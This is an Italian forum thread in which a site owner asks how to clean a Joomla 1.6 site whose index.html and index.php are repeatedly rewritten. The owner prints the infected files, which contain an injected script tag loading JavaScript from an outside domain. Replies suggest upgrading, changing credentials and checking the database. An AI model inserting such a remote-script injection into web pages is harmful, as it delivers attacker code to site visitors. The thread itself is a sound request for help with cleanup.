Sito Web Infetto

Printable View

20-02-2012, 02.53.16

Sito Web Infetto

Salve, qualcuno saprebbe dirmi come disinfettare un webspace infettato da questo virus? ho notato che si ostina a modificare i codici dei files index.html e index.php. I siti in questione sono QUESTO e QUESTO. Entrambi si basano sulla piattaforma Joomla 1.6
Di seguito vi posto i files incriminati, in modo da farvi capire...

index.html

Codice:

<html> <body><script type="text/javascript" src="http://robertwalz.com/header.js"></script> </body> </html>

ecco la parte incriminata

Codice:

<script type="text/javascript" src="http://robertwalz.com/header.js"></script>

index.php

Codice:

<?php /** * @package Joomla.Site * @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ // Set flag that this is a parent file. define('_JEXEC', 1); define('DS', DIRECTORY_SEPARATOR); if (file_exists(dirname(__FILE__) . '/defines.php')) { include_once dirname(__FILE__) . '/defines.php'; } if (!defined('_JDEFINES')) { define('JPATH_BASE', dirname(__FILE__)); require_once JPATH_BASE.'/includes/defines.php'; } require_once JPATH_BASE.'/includes/framework.php'; // Mark afterLoad in the profiler. JDEBUG ? $_PROFILER->mark('afterLoad') : null; // Instantiate the application. $app = JFactory::getApplication('site'); // Initialise the application. $app->initialise(); // Mark afterIntialise in the profiler. JDEBUG ? $_PROFILER->mark('afterInitialise') : null; // Route the application. $app->route(); // Mark afterRoute in the profiler. JDEBUG ? $_PROFILER->mark('afterRoute') : null; // Dispatch the application. $app->dispatch(); // Mark afterDispatch in the profiler. JDEBUG ? $_PROFILER->mark('afterDispatch') : null; // Render the application. $app->render(); // Mark afterRender in the profiler. JDEBUG ? $_PROFILER->mark('afterRender') : null; // Return the response. echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script></body></html>

ed ecco la parte incriminata!!!

Codice:

// Return the response. echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script></body></html>

Qualcuno sa fornirmi assistenza?! Grazie!! :)

EDIT:
Ho provato a scaricare tutti i files sul mio pc e li ho analizzati con NOD32. Nessun risultato riscontrato!
20-02-2012, 09.47.56
dapeco

joompla 1.6 è molto "vecchio", dovresti aggiornarlo almeno alle 1.7 (dopo aver bonificato le pagine). Probabilmente è lì il buco sfruttato per inserire quel codice malevolo. Cambia anche le credenziali di accesso ai tuoi account.
20-02-2012, 12.52.07

Citazione:

Originalmente inviato da dapeco

joompla 1.6 è molto "vecchio", dovresti aggiornarlo almeno alle 1.7 (dopo aver bonificato le pagine). Probabilmente è lì il buco sfruttato per inserire quel codice malevolo. Cambia anche le credenziali di accesso ai tuoi account.

Ho già cambiato le credenziali di accesso e cancellato il codice da molti files ma non capisco perchè il problema continua a ripresentarsi! Come posso "bonificare" del tutto le pagine? C'è qualche programma che può svolgere questa funzione? Ci tengo a specificare che ho già rimosso tutti i files da uno dei siti, reinstallato il tutto ma nonostante ciò il problema si ripresenta :(
20-02-2012, 12.54.57
dapeco

Il problema è che probabilmente quella versione di joomla è compromessa, quindi la cosa importante da fare è aggiornare, ma per farlo è meglio avere le pagine pulite.

Non conosco software che possano bonificarti le pagine con 1 click purtroppo.
20-02-2012, 13.02.15

Capito! Secondo te, visto il problema, ci sarà uno script che effettua queste modifiche alle pagine? E, se si, dove potrebbe nascondersi? Ho notato che vengono ri-modificate tutte contemporaneamente...quindi mi sa che stiamo parlando di un sistema automatizzato...
20-02-2012, 13.06.11
dapeco

Purtroppo non saprei, ovviamente presuppongo che tu abbia solo joomla installato sull'account e non altri eventuali applicativi.
20-02-2012, 13.06.53

Citazione:

Originalmente inviato da dapeco

Purtroppo non saprei, ovviamente presuppongo che tu abbia solo joomla installato sull'account e non altri eventuali applicativi.

Si, soltanto Joomla! :(
21-02-2012, 11.03.45

Ciao, provo a darti un'ulteriore idea su dove guardare.
Il codice malevolo potrebbe nascondersi in qualche componente .php modificato dal virus di joomla o qualche javascrip nascostosi tra i files del tuo spazio su server, ma forse potrebbe anche nascondersi nel contenuto degli articoli, che joomla salva su DB Mysql.

Quindi all'apertura della home page, non appena viene visualizzata una pagina, il codice viene eseguito.

Dovresti fare un dump dell'intero DB su flat file e controllare il contenuto delle tabelle.
Non so se esistano tools per controllare/bonificare i dati su Mysql. Dovrei cercare in rete.
I più incriminati sono i campi testo e memo.

Non saprei in quali altri altri posti dove cercare.